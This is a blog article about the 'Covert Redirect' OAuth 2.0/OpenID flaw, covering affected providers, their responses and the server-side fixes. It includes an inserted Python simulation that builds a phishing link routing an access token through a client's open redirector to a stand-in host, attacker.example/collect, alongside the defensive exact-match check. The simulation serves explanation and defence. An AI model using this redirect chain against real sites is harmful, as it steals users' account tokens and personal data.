
Security flaw found in OAuth and OpenID affects Google, Microsoft and Facebook

A serious weakness has been found in the way OAuth 2.0 and OpenID, the protocols designed to protect user credentials, are deployed by many sites. These login mechanisms issue tokens that let users sign in to websites including Facebook, Google, LinkedIn and those owned by Microsoft with a single centralised account, without the third-party website ever seeing the user's username or password.

It was discovered by Wang Jing, a Ph.D. student at Nanyang Technological University. Called "Covert Redirect", the flaw lets an attacker trick users into authorising an app or site through a crafted phishing link. The link points at the real identity provider's authorisation endpoint, but its redirect_uri parameter names a page on a legitimate partner site that happens to forward visitors wherever a query parameter tells it to (an open redirector). If the provider only checks that the redirect_uri's domain matches the registered site rather than the exact registered URL, the flow completes normally from the user's point of view. For example, if you visit a site and click a button to log in with Google or Facebook, you see the familiar authorisation popup; if you click Authorize, the token carrying your personal data is sent through the partner site's redirector to the attacker instead of to the site. This can include your email address, contact lists, birthday and more. The same mechanism can also land you on a look-alike website under the attacker's control.

Perhaps the scariest thing is that Covert Redirect does not rely on a fake domain that a savvy user might spot. The authorisation popup is served by the real identity provider, and the redirect_uri shown in the link belongs to the real site you are trying to log in to, so there is nothing obviously wrong to detect.
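The flow described above, as an added example that is not code from the original article or from any of the providers it names. It models an OAuth 2.0 implicit-grant provider, a client site that ships an open redirector at /redirect?next=..., and a browser that follows 302s; the hosts client.example and attacker.example, the client ID, and the token value are all constructed for the example. Run it and the lax provider (domain-only redirect_uri check) leaks the token to the attacker's host, while the strict provider (exact match against the registered callback) refuses the crafted request outright.

```python
"""Covert Redirect simulation (added example, not from the original article).

Provider side: an authorization endpoint with either a lax (domain-only) or
strict (exact-match) redirect_uri check.  Client side: a real callback plus
an open redirector.  Browser side: follows redirects and, like real browsers,
carries the URL fragment across a 302 whose Location has no fragment.
All hosts, identifiers and the token value below are constructed.
"""
from urllib.parse import urlparse, urlunparse, parse_qs, urlencode

# Constructed client registration: only the exact callback URL is registered.
REGISTERED_CLIENTS = {
    "client-123": {"redirect_uris": ["https://client.example/oauth/callback"]},
}
ACCESS_TOKEN = "tok_EXAMPLE_NOT_REAL"  # constructed, not a real token


def redirect_uri_allowed(client_id, redirect_uri, strict):
    """Provider-side check.  strict=True compares against the registered list
    exactly; strict=False is the domain-only comparison Covert Redirect abuses."""
    client = REGISTERED_CLIENTS.get(client_id)
    if client is None:
        return False
    if strict:
        return redirect_uri in client["redirect_uris"]
    registered_hosts = {urlparse(u).netloc for u in client["redirect_uris"]}
    return urlparse(redirect_uri).netloc in registered_hosts


def authorize(client_id, redirect_uri, state, strict):
    """Authorization endpoint after the user clicks 'Allow'.  Returns the
    Location the browser is sent to (token in the fragment), or None if refused."""
    if not redirect_uri_allowed(client_id, redirect_uri, strict):
        return None
    parts = urlparse(redirect_uri)
    fragment = urlencode({"access_token": ACCESS_TOKEN, "state": state})
    return urlunparse(parts._replace(fragment=fragment))


def client_site(url):
    """The OAuth client's web server.  /oauth/callback is the genuine callback;
    /redirect?next=... is an open redirector, which is the client-side flaw."""
    parts = urlparse(url)
    if parts.path == "/redirect":
        target = parse_qs(parts.query).get("next", [""])[0]
        return ("302", target)
    if parts.path == "/oauth/callback":
        return ("200", url)
    return ("404", url)


def browser_follow(url, max_hops=5):
    """Follow 302s from client.example.  The fragment is preserved when the
    Location has none of its own, so the token travels with the redirect."""
    for _ in range(max_hops):
        parts = urlparse(url)
        if parts.netloc != "client.example":
            return url  # left the client site; this URL is what the attacker sees
        status, location = client_site(url)
        if status != "302":
            return url
        loc = urlparse(location)
        if not loc.fragment:
            location = urlunparse(loc._replace(fragment=parts.fragment))
        url = location
    return url


def run_attack(strict):
    """The phishing link: redirect_uri is the client's open redirector with
    next= pointing at the attacker.  Returns (final_url, token_leaked)."""
    redirect_uri = "https://client.example/redirect?" + urlencode(
        {"next": "https://attacker.example/collect"})
    location = authorize("client-123", redirect_uri, "xyz", strict)
    if location is None:
        return (None, False)
    final = browser_follow(location)
    final_parts = urlparse(final)
    leaked = (final_parts.netloc == "attacker.example"
              and ACCESS_TOKEN in final_parts.fragment)
    return (final, leaked)


if __name__ == "__main__":
    for strict in (False, True):
        print("strict" if strict else "lax  ", run_attack(strict))
```

The two fixes the simulation makes visible are independent: the provider must match redirect_uri exactly against what the client registered, and the client must not expose an open redirector. Either one alone stops this particular chain; the provider-side fix is the one that protects every client at once.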

The information an attacker can obtain this way includes email addresses, birth dates and contact lists, and in the worst case the access token itself, which grants the same access to the account that the user just authorised. Because the leak rides on a redirect from the legitimate site, the victim's browser also ends up on the attacker's destination after the authorisation (in this case a Facebook login) completes, rather than on the site they meant to visit, which exposes them to further attacks.

Wang says he has already informed Facebook about the flaw, and the company said that it “understood the risks associated with OAuth 2.0,” and that fixing this bug would not be accomplished in the short term. According to Wang, Facebook, Google, LinkedIn, Yahoo, Microsoft, PayPal, QQ, Weibo, Taobao, VK.com, Mail.Ru, GitHub are the sites affected so far. The student also reported the flaw to Google, LinkedIn and Microsoft.

Google said the problem was being tracked, and LinkedIn said it was preparing an announcement addressing the bug. Microsoft has already investigated and concluded that the vulnerability lay in a third-party domain, not on Microsoft sites.

Users who wish to avoid any potential loss of data should be wary of links that immediately ask them to log in to Facebook or Google, particularly links arriving by email or from untrusted pages. Closing the tab before clicking Authorize prevents the token from ever being issued; once you have authorised, the redirect has already happened and closing the tab no longer helps. For site operators, the fix is on the server side: identity providers should match the redirect_uri exactly against the URL the client registered, and client sites should not expose open redirectors.

Posted by Ankit Kumar Titoriya at 10:26


All Rights Reserved by gaklakl © 2014 - 2015
